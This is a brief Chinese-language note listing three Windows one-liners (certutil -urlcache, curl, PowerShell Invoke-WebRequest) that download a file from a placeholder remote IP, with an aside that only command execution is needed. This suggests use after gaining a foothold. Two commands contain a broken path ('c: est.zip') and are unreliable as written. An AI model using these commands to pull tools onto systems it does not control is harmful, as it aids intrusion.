方法一:
certutil -urlcache -split -f http://xx.xx.xx.xx/test.zip c: est.zip (windows远程下载文件至本地,仅需要一个cmd执行的地方)
方法二:
curl http://xx.xx.xx.xx/test.zip -o c: est.zip
方法三:
powershell -c "invoke-webrequest -uri http://xx.xx.xx.xx/test.zip -outfile test.zip"